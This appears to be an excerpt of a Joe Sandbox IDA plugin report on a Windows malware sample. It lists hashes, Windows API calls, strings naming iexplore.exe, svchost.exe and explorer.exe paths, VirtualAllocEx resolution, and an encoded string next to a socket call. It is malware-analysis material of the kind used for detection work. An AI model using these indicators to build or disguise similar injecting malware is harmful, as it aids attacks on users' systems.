      • Opcode ID: 2a95b7976e450539db6e4a92fc2bb05a3aec52f51334e53e5acddcc7a32b5a7b
      • Instruction ID: 782b23fc7fe4eadffc9be543d9f3ff17d391247f2d2b8b0a52209ba6c093ed9f
      • Opcode Fuzzy Hash: 2a95b7976e450539db6e4a92fc2bb05a3aec52f51334e53e5acddcc7a32b5a7b
      • Instruction Fuzzy Hash: DF31F436A042058FD724EF18C980A6773E5EFC0304F148A7EE88697791D738EA49C799
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405627
      • lstrcat.KERNEL32 ref: 0040563C
      • lstrcpy.KERNEL32(?,?), ref: 00405661
      Strings
      • \Program Files\Internet Explorer\, xrefs: 00405631
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \Program Files\Internet Explorer\
      • API String ID: 2630975639-1791216374
      • Opcode ID: 53e5bf784afc1c7f98d196b5d2c075a3a29870daf7455d8179ced0f2b91ad3c8
      • Instruction ID: bfcf0f80d20a37eb35ee965870948888e4b0ca92358fc844c94cae622ae2a00a
      • Opcode Fuzzy Hash: 53e5bf784afc1c7f98d196b5d2c075a3a29870daf7455d8179ced0f2b91ad3c8
      • Instruction Fuzzy Hash: E9F02BB12441106BD728D71CEC51BEB77D4AFC8700F44043DF6CAE3290D6798558C696
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004053E7
      • lstrcat.KERNEL32 ref: 004053FC
      • lstrcpy.KERNEL32(?,?), ref: 00405421
      Strings
      • \Program Files\Internet Explorer\iexplore.exe, xrefs: 004053F1
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \Program Files\Internet Explorer\iexplore.exe
      • API String ID: 2630975639-1907246925
      • Opcode ID: fe9f5981c5107a24eb4662b232e7904ca7b9376e4c5a8c7cef9e7edc2118fddf
      • Instruction ID: f78577937c66193e5ff90f452aee5a2bd68c8ab3a1555d09418fe11549a69a2a
      • Opcode Fuzzy Hash: fe9f5981c5107a24eb4662b232e7904ca7b9376e4c5a8c7cef9e7edc2118fddf
      • Instruction Fuzzy Hash: 6EF050712441146BD728D71CEC51BDB77E4AFC8700F44043DFACAE3290D6B88558CB96
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405467
      • lstrcat.KERNEL32(?,\svchost.exe), ref: 00405477
      • lstrcpy.KERNEL32(?,?), ref: 0040549C
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \svchost.exe
      • API String ID: 2630975639-2416354339
      • Opcode ID: b05241eece7025ff61889c251bc4ad8f72369c5d8e446100e120ddc31d5d9856
      • Instruction ID: 4611d1f1260c59ae314430bfba731fbd35f7976e4dc38790d624a9758d3b1088
      • Opcode Fuzzy Hash: b05241eece7025ff61889c251bc4ad8f72369c5d8e446100e120ddc31d5d9856
      • Instruction Fuzzy Hash: 8EF059716042106BD738D728EC91BEB77D8AF88700F400439BA8AE32A0D6799494CA86
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004054D7
      • lstrcat.KERNEL32(?,\explorer.exe), ref: 004054E7
      • lstrcpy.KERNEL32(?,?), ref: 0040550C
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \explorer.exe
      • API String ID: 2630975639-1502772786
      • Opcode ID: 823721c289e2eba20add7c8bdeb04609ff25960a1b4460d0f14d2c567736ea70
      • Instruction ID: cf47fa7405b68876a61fa54a680553e6956fd93f1a60e47cd12e063c3e371ca6
      • Opcode Fuzzy Hash: 823721c289e2eba20add7c8bdeb04609ff25960a1b4460d0f14d2c567736ea70
      • Instruction Fuzzy Hash: 09F059712402106BD738D728ED91BEB77D8AFC8700F400439BACAE32A0D6798494CA86
      APIs
      • LoadLibraryA.KERNEL32(kernel32.dll,0040B273,0040B114,14BEE2C9,0040B0B7,000000AC,487638D3,0040B0C1,487638D3,004048BD,?,00000000,EDC,00000041), ref: 00407212
      • GetProcAddress.KERNEL32(CD4C01B8,SetFilePointer,?,00000000,EDC,00000041), ref: 00407228
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressLibraryLoadProc
      • String ID: SetFilePointer$kernel32.dll
      • API String ID: 2574300362-4212435992
      • Opcode ID: 47063d3ea6f2ae20e95bcafe6dd272a25eee96bbf78a12eefe1d0fbbba9612ce
      • Instruction ID: 92d5dbadcdb673f041f62a2f547e8e2a008e0ea9c6cffdde93753ed389d37c6a
      • Opcode Fuzzy Hash: 47063d3ea6f2ae20e95bcafe6dd272a25eee96bbf78a12eefe1d0fbbba9612ce
      • Instruction Fuzzy Hash: 18D0C9B09882409BD600ABA4EF095063BA5B6063103100475EA06BA3E5D27424568A0E
      APIs
      • GetModuleHandleA.KERNEL32(Kernel32.dll,VirtualAllocEx,00000000,0040205D), ref: 00404C1D
      • GetProcAddress.KERNEL32(00000000), ref: 00404C24
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: Kernel32.dll$VirtualAllocEx
      • API String ID: 1646373207-2312931118
      • Opcode ID: bc67872528889f18fc269d71765628177d41be209ebb95b5a36184931c2f64ff
      • Instruction ID: 1f5087a167780450935ce27456e9c382f66f6d31a4a0d8f7e720613a16c3e223
      • Opcode Fuzzy Hash: bc67872528889f18fc269d71765628177d41be209ebb95b5a36184931c2f64ff
      • Instruction Fuzzy Hash: 90C08CB12802205FC6507BA4BE0DA963E58EA04B11312083AF0C6F2290C9B40850879A
      APIs
      Strings
      • O5WGU2RYGMXDGMZSGIXG64THHI4DG===, xrefs: 00402FDB
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: setsockopt
      • String ID: O5WGU2RYGMXDGMZSGIXG64THHI4DG===
      • API String ID: 3981526788-1710454822
      • Opcode ID: f02676a5f20a0448794ca7539439c6700ce440e1f56ecd6caa4025d4a2f7fda6
      • Instruction ID: dab42955ede70b45eea24b3139e0784c7e83a395bc8883f859031c1f01a4b626
      • Opcode Fuzzy Hash: f02676a5f20a0448794ca7539439c6700ce440e1f56ecd6caa4025d4a2f7fda6
      • Instruction Fuzzy Hash: CB118F725083019FE310DF1DCC41A9BBBE8FFC8714F44496EF595A6291E3B0D6088E92